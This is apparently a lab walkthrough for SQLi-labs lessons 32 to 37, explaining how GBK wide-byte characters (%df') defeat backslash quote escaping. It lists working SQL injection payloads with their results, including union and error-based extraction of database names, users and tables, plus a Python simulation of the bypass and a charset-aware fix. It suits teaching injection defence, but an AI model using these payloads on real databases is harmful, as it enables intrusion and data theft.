Lessons 32 to 35 add a backslash (%5c) before every quote.

We need to use wide (multibyte) characters to inject our queries.

Why? When MySQL uses the GBK encoding, it treats two bytes as one Chinese character. For example, %aa%5c is treated as a single Chinese character (the first byte must be greater than 128). So if you inject %df%27, it becomes %df%5c%27 once the filter adds a backslash (%5c) before the single quote (%27). The first two bytes (%df%5c) are consumed as one Chinese character, and what remains is a bare %27 ('), which is exactly what we want.

External link: Multibyte character exploits - PHP/MySQL

When injecting through the GET method (the payload sits in the URL), the injected data goes through URL encoding, so we can write %df directly in the URL and get the query we want.

When using the POST method (lesson 34), we need another approach: convert the quote from UTF-8 to UTF-16 or UTF-32. For example, convert the single quote (') to �' (UTF-16).
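To see why the byte-level quote filter fails once the server decodes the bytes as GBK, here is an added Python simulation (not part of SQLi-labs or of the original post) of the addslashes-style filter, the server-side GBK decode, and a charset-aware escape that does not have the problem. The function names and the sample input b"\xdf'" (the %df%27 prefix from the lesson, as raw bytes) are constructed for this example.

```python
# Added simulation of the GBK "wide character" bypass described above and of a
# charset-aware escape that closes it. Constructed example: no database involved.

def addslashes(raw: bytes) -> bytes:
    """Byte-oriented escaping like PHP addslashes(): a backslash (0x5C) before ' " \\ and NUL."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)

def mysql_sees(escaped: bytes, charset: str = "gbk") -> str:
    """Decode the escaped bytes the way a server using a multibyte connection charset does.
    In GBK a lead byte >= 0x81 swallows the following byte, backslash (0x5C) included."""
    return escaped.decode(charset, errors="replace")

def filter_held(decoded: str) -> bool:
    """Scan like the SQL lexer: a backslash consumes the next character;
    a bare single quote means the quote filter was bypassed."""
    i = 0
    while i < len(decoded):
        if decoded[i] == "\\":
            i += 2
            continue
        if decoded[i] == "'":
            return False
        i += 1
    return True

def charset_aware_escape(raw: bytes, charset: str = "gbk") -> bytes:
    """Escape on decoded characters (what setting the connection charset before
    real_escape_string achieves), so no stray lead byte can pair with the backslash."""
    text = raw.decode(charset, errors="replace")  # a lone 0xDF becomes U+FFFD
    escaped = "".join("\\" + ch if ch in "'\"\\" else ch for ch in text)
    return escaped.encode(charset, errors="replace")  # U+FFFD is written as '?'

if __name__ == "__main__":
    payload = b"\xdf'"  # constructed: the %df%27 prefix from the lesson as raw bytes
    naive = mysql_sees(addslashes(payload))
    safe = mysql_sees(charset_aware_escape(payload))
    print("addslashes    ->", repr(naive), "filter held:", filter_held(naive))
    print("charset-aware ->", repr(safe), "filter held:", filter_held(safe))
```

Run with the ASCII input b"1'" as well to confirm that the plain filter holds there, which is why the bypass only shows up with a lead byte above 0x80.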

SQLi-labs: Lesson 32 & 33

Query:

?id=%df' union select 1,database(),3--+

Result:

Your Login name:security

Query:

?id=%ef' and extractvalue(1,(select group_concat(table_name) from information_schema.tables where table_schema=database()));--+

Result:

XPATH syntax error: ',referers,uagents,users'


SQLi-labs: Lesson 34

Query 1:

�' or 1=1#

Result 1:

Your Login name:Dumb
Your Password:Dumb

Query 2:

�' union select version(),database()--<sp here>

Result 2:

Your Login name:5.6.30-1
Your Password:security


SQLi-labs: Lesson 35

In this lesson, there are no quotes around the parameter $id.

Query:

?id=0 union select 1,version(),database()--+

Result:

Your Login name:5.6.30-1
Your Password:security


SQLi-labs: Lesson 36

Query:

?id=%df' union select 1,user(),database()--+

Result:

Your Login name:root@localhost
Your Password:security

Query (' in UTF-16):

?id=0%EF%BF%BD'union select 1,user(),version()--+

Result:

Your Login name:root@localhost
Your Password:5.6.30-1


SQLi-labs: Lesson 37

Same as Lesson 34.
